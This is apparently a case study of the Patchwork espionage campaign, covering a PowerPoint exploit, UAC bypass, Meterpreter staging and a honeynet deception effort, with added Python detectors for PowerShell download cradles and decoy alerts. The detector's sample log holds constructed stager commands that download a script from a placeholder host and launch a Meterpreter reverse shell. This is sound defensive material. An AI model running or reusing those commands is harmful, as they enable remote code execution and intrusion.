
Patchwork

CASE STUDY, COURTESY OF GADI EVRON, CYMMETRIA


Background

• First observed December 2015
• At least 2,500 machines infected
• Targets: military and political personnel
  ― Especially those working on issues related to S.E. Asia and the South China Sea
• Attack vector: PowerPoint presentation (PPS file)
• Exploit: Sandworm (CVE-2014-4114), a flaw in the Windows OLE package manager that is reached through the PPS file
  ― Only unpatched systems are affected; Microsoft's fix (MS14-060) had been available since October 2014
First Stage Payload: Compiled Script

• The script was written in AutoIt and compiled to an executable
• It bypassed UAC using a method called UACMe, which had been posted publicly on a hacker forum
Next Stages

• With elevated privileges, it used PowerSploit to download and run Meterpreter
  ― Meterpreter is the in-memory post-exploitation agent (the remote-access component) of the Metasploit penetration testing framework
• Meterpreter was used to locate and exfiltrate documents so the attacker could gauge the value of the target
  ― If the target was judged valuable, the attacker delivered a second payload, also assembled from code snippets taken from online forums and other public resources

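The PowerSploit download-and-run stage above is the kind of PowerShell command line that process-creation or script-block logging captures. As an added example (not code from the deck or from Cymmetria), here is a small Python triage that flags download cradles and PowerSploit's Invoke-Shellcode, decoding an -EncodedCommand argument first so the heuristics see the real script. Every log line is constructed; the pattern list, the two-indicator threshold, and the 198.51.100.7 address are this example's assumptions, not indicators from the report.

```python
import base64
import re

# Heuristics for the PowerSploit-style download-and-execute stage. Each entry is
# (pattern, reason). These are this example's own choices, not Cymmetria's rules.
CRADLE_PATTERNS = [
    (re.compile(r"new-object\s+(?:system\.)?net\.webclient", re.I), "WebClient instantiation"),
    (re.compile(r"\.download(?:string|file|data)\s*\(", re.I), "download method call"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "in-memory execution (IEX)"),
    (re.compile(r"invoke-shellcode", re.I), "PowerSploit Invoke-Shellcode"),
    (re.compile(r"windows/meterpreter/reverse_\w+", re.I), "Meterpreter payload name"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
]


def decode_encoded_command(command):
    """Return the command plus the decoded script if it carries -enc/-EncodedCommand.
    PowerShell expects that argument as base64 of UTF-16LE text."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", command, re.I)
    if not m:
        return command
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command
    return command + " " + decoded


def analyze(command):
    """List the reasons a command line looks like a download cradle."""
    text = decode_encoded_command(command)
    return [reason for rx, reason in CRADLE_PATTERNS if rx.search(text)]


def is_suspicious(command, threshold=2):
    """Two or more independent indicators: alert. One alone (a bare IEX, say) is
    too common in admin scripts to act on."""
    return len(analyze(command)) >= threshold


def triage(lines):
    """Return (index, reasons) for every suspicious line in a batch of logs."""
    return [(i, analyze(line)) for i, line in enumerate(lines) if is_suspicious(line)]


# Constructed sample command lines (Event ID 4688 style). The host 198.51.100.7 is
# a documentation address chosen for this example, not an indicator from the report.
_STAGER = ('IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/is.ps1"); '
           "Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
           "-Lhost 198.51.100.7 -Lport 443 -Force")
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_LOG = [
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -w hidden -enc " + _ENCODED,
    'powershell.exe IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/Invoke-Shellcode.ps1")',
    "powershell.exe IEX (Get-Content .\\profile.ps1 | Out-String)",
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(reasons)}")
```

The scoring is deliberately additive: the encoded, hidden-window stager trips every rule once decoded, the plain cradle trips four, and the admin's backup script and the local IEX of a profile stay below the threshold.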
Next Stages (cont)

Deception Campaign

• Goal: discover as much as possible about the threat actor, especially its tools, techniques and procedures
  ― Allowing subsequent detection elsewhere
  ― Preventing future attacks against Cymmetria's customer
• Honeynet environment
  ― Breadcrumbs: snippets of data planted on real machines that lead the attacker to a decoy: credentials, browser cookies, network shares, VPN connections, etc.
  ― Decoys: full operating systems running in VMs that represent high-value targets for the attacker; they have no legitimate users, so any interaction with them is an alert
• The lure: a fake profile for a person in whom the attacker was interested

The Deception Campaign

The Chain of Events

1. The PowerPoint PPS was opened on a target laptop and dropped the initial payload components
2. The Meterpreter reverse shell was pulled from the C2 server
3. Files from the target laptop were exfiltrated to the C2 server, along with some encrypted traffic
4. The attacker decided to drop the second-stage malware, which scanned the hard drive
5. It copied itself to C:\Windows\SysWoW64\netvmon.exe and added that path to the startup programs
6. Three days later, alerts were received from the decoy running an SMB share
7. The malware accessed the shared drive and scanned it for files
8. Someone attempted to connect to a cloud decoy using RDP
9. The login failed (valid credentials could have been obtained with Mimikatz)
10. The source IP address suggests the same attacker

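The breadcrumb and decoy mechanism, and steps 6 to 10 of the chain above, reduce to one detection rule: decoys have no legitimate users and breadcrumb credentials no legitimate use, so any touch is an alert, and the alerts are then correlated by source address. This is an added example, not Cymmetria's own honeynet code: a Python correlator over a constructed event feed, plus a check for the netvmon.exe autostart entry from step 5. Host names, addresses, the breadcrumb account, the Run-key form of the autostart entries and the pipe-delimited log format are all assumptions of this example.

```python
from collections import defaultdict
from datetime import datetime

# Honeynet inventory. All names and addresses are constructed for this example;
# the deck describes the real decoys and breadcrumbs only in prose.
DECOY_HOSTS = {"DECOY-FS01": "SMB share decoy", "DECOY-CLOUD-01": "cloud RDP decoy"}
BREADCRUMB_ACCOUNTS = {"svc_backup_hb"}   # credential planted on the infected laptop
KNOWN_C2 = {"203.0.113.55"}                # reused C2 address (documentation range)
# Persistence indicator from step 5 of the chain of events above.
PERSISTENCE_PATH = r"c:\windows\syswow64\netvmon.exe"


def parse_event(line):
    """Parse 'ts|kind|host|src_ip|account|detail' (a constructed log format)."""
    ts, kind, host, src, account, detail = line.split("|", 5)
    return {"ts": datetime.fromisoformat(ts), "kind": kind, "host": host,
            "src": src, "account": account, "detail": detail}


def alert_reasons(ev):
    """Decoys have no legitimate users and breadcrumbs no legitimate use, so any
    touch is an alert in its own right; no baseline or threshold is needed."""
    reasons = []
    if ev["host"] in DECOY_HOSTS:
        reasons.append("touched " + DECOY_HOSTS[ev["host"]])
    if ev["account"] in BREADCRUMB_ACCOUNTS:
        reasons.append("used breadcrumb credential " + ev["account"])
    if ev["src"] in KNOWN_C2:
        reasons.append("source address previously seen as C2")
    return reasons


def correlate(lines):
    """Group alerts by source address in time order, so the SMB activity on one
    decoy and the later RDP attempt on another can be read as one intrusion."""
    chains = defaultdict(list)
    for ev in map(parse_event, lines):
        reasons = alert_reasons(ev)
        if reasons:
            ev["reasons"] = reasons
            chains[ev["src"]].append(ev)
    return {src: sorted(evs, key=lambda e: e["ts"]) for src, evs in chains.items()}


def decoys_touched(chains):
    """Distinct decoys per source address: the step-10 'same attacker' inference
    starts from this table."""
    return {src: sorted({e["host"] for e in evs if e["host"] in DECOY_HOSTS})
            for src, evs in chains.items()}


def autostart_hits(entries):
    """Flag autostart entries that point at the netvmon.exe path. Run-key strings
    are this example's assumption about how 'startup programs' were set."""
    return [e for e in entries if PERSISTENCE_PATH in e.lower()]


# Constructed sample telemetry: the infected laptop (10.0.5.23) follows the share
# breadcrumb, a legitimate user touches a real server, then a C2 address fails RDP.
SAMPLE_EVENTS = [
    r"2016-01-04T09:12:00|smb_share_access|DECOY-FS01|10.0.5.23|svc_backup_hb|\\DECOY-FS01\Projects",
    r"2016-01-04T09:12:40|file_read|DECOY-FS01|10.0.5.23|svc_backup_hb|Projects\SCS_brief.pptx",
    r"2016-01-04T10:02:00|smb_share_access|FS-PROD-02|10.0.5.40|jdoe|\\FS-PROD-02\Finance",
    r"2016-01-05T02:41:10|rdp_logon_failed|DECOY-CLOUD-01|203.0.113.55|administrator|bad password",
]
SAMPLE_AUTOSTART = [
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\netvmon = C:\Windows\SysWoW64\netvmon.exe",
]

if __name__ == "__main__":
    chains = correlate(SAMPLE_EVENTS)
    for src, evs in chains.items():
        for e in evs:
            print(f"{e['ts']} {src} -> {e['host']} {e['kind']}: {'; '.join(e['reasons'])}")
    print("decoys per source:", decoys_touched(chains))
    print("persistence:", autostart_hits(SAMPLE_AUTOSTART))
```

Note what the correlation does and does not give you: the laptop's SMB activity and the RDP attempt come from different addresses, so they are tied together only because the RDP source is already on the C2 list, which is exactly the inference step 10 makes; a failed RDP logon on a decoy from an unknown address is still an alert, just not yet attributed.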
Honeynet Map

PPS Files on the C2 Server

Secondary Infection Stages

Attribution

Mapped to the Working Day (darker grey indicates more edits)

Lessons

• Reconnaissance: collection of identity information on military and political workers with specific interests
• Weaponization: infected PowerPoint presentation
  ― Many military/government briefing packages are delivered as PowerPoint
• Delivery: spear-phishing campaign, reusing documents exfiltrated earlier
• Exploit: a chain: Sandworm (CVE-2014-4114), privilege escalation (UAC bypass), then Meterpreter pulled from C2
  ― Also: PATCH! The exploit only works on systems missing a fix that was already public
• Action on objectives: exfiltration of documents
• Exploit 2: 7zip.exe -> netvmon.exe
• Installation: added to startup programs
• Action on objectives: exfiltration
• C2: various reused IP addresses
• Full report available at https://cymmetria.com/research/patchwork-targeted-attack/

